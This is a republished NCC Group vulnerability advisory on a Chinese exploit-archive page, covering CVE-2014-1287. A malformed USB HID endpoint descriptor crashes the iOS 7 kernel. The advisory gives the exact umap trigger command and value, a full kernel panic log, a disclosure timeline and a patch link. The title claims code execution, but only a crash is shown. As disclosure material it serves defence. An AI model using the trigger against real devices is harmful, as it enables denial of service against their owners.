首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
iOS 7 Arbitrary Code Execution
来源:nccgroup.com 作者:Davis 发布时间:2014-03-17  
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
 Vulnerability Summary
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

 Title             iOS 7 arbitrary code execution in kernel mode
 Release Date      14 March 2014
 Reference         NGS00596
 Discoverer        Andy Davis 
 Vendor            Apple
 Vendor Reference  600217059
 Systems Affected  iPhone 4 and later, iPod touch (5th generation) and later, 
                   iPad 2 and later
 CVE Reference     CVE-2014-1287
 Risk              High
 Status            Fixed

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
 Resolution Timeline
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

 Discovered        26 September 2013
 Reported          26 September 2013
 Released          26 September 2013
 Fixed             10 March 2014
 Published         14 March 2014

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
 Vulnerability Description 
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

 When a specific value is supplied in USB Endpoint descriptor for a HID device 
 the Apple device kernel panics and reboots

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
 Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

 The bug can be triggered using umap (https://github.com/nccgroup/umap)
 as follows:

 sudo python3 ./umap.py -P /dev/ttyUSB0 -s 09:00:00:E:46

 bMaxPacketSize = 0xff

 Incident Identifier: F0856C91-7616-4DAC-9907-C504401D9951
 CrashReporter Key:   7ed804add6a0507b6a8ca9625f0bcd14abc6801b
 Hardware Model:      iPhone3,1
 Date/Time:           2013-09-26 12:35:46.892 +0100
 OS Version:          iOS 7.0 (11A465)

 panic(cpu 0 caller 0x882220a5): kernel abort type 4: fault_type=0x1, 
 fault_addr=0x28
 r0:   0x00000003  r1: 0x889e70bd  r2: 0x00000012  r3: 0xfffffffe
 r4:   0x9ae83000  r5: 0x00000003  r6: 0x00000000  r7: 0x87ff3d78
 r8:   0x00000000  r9: 0x00000000 r10: 0x00000000 r11: 0x00000001
 r12:  0x87ff3d50  sp: 0x87ff3d10  lr: 0x88af52bf  pc: 0x88af51f8
 cpsr: 0x80000033 fsr: 0x00000005 far: 0x00000028

 Debugger message: panic
 OS version: 11A465
 Kernel version: Darwin Kernel Version 14.0.0: Tue Aug 13 21:39:05 PDT 2013; 
 root:xnu-2423.1.73~3/RELEASE_ARM_S5L8930X
 iBoot version: iBoot-1940.1.75
 secure boot?: YES
 Paniclog version: 1
 Kernel slide:     0x0000000008200000
 Kernel text base: 0x88201000
 Epoch Time:        sec       usec
   Boot    : 0x52441b69 0x00000000
   Sleep   : 0x00000000 0x00000000
   Wake    : 0x00000000 0x00000000
   Calendar: 0x52441bb5 0x00056497

 Panicked task 0x896f8d48: 12856 pages, 114 threads: pid 0: kernel_task
 panicked thread: 0x8023de90, backtrace: 0x87ff3a48
		  lr: 0x88317889  fp: 0x87ff3a7c
		  lr: 0x883181f7  fp: 0x87ff3ab0
		  lr: 0x882b783b  fp: 0x87ff3ad4
		  lr: 0x882220a5  fp: 0x87ff3ba0
		  lr: 0x8821c7c4  fp: 0x87ff3d78
		  lr: 0x88af8687  fp: 0x87ff3da8
		  lr: 0x8828b5bd  fp: 0x87ff3dd0
		  lr: 0x889d6d29  fp: 0x87ff3df0
		  lr: 0x889da2f3  fp: 0x87ff3e18
		  lr: 0x8828b5bd  fp: 0x87ff3e40
		  lr: 0x889da14f  fp: 0x87ff3e7c
		  lr: 0x88acb8e7  fp: 0x87ff3eb8
		  lr: 0x88ac9815  fp: 0x87ff3ed4
		  lr: 0x884b24d3  fp: 0x87ff3f60
		  lr: 0x882cf869  fp: 0x87ff3fa8
		  lr: 0x8821f05c  fp: 0x00000000

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
 Fix Information
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

 A patch can be downloaded from the following location:
 http://support.apple.com/kb/HT1222
  
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
 NCC Group
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

 Research     https://www.nccgroup.com/research
 Twitter      https://www.twitter.com/NCCGroupInfoSec / @NCCGroupInfoSec
 Open Source  https://github.com/nccgroup
 Blog         https://www.nccgroup.com/en/blog/cyber-security/
 SlideShare   http://www.slideshare.net/NCC_Group/


For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>
This email message has been delivered safely and archived online by Mimecast.
</a>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·OS X / Safari / Firefox REGEX
·Trixbox Pro Remote Command Exe
·Free Download Manager 3.x Buff
·Gold MP4 Player 3.3 - Universa
·MicroP 0.1.1.1600 - (.mppl) Lo
·Firefox Exec Shellcode From Pr
·HP-UX rlpdaemon local exploit
·Zoo 2.10 - Parse.c Local Buffe
·Array Networks vxAG / xAPV Pri
·Ruby Gem Arabic Prawn 0.0.1 Co
·NTP Spoofed "monlist query" De
·Quantum vmPRO Backdoor Command
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved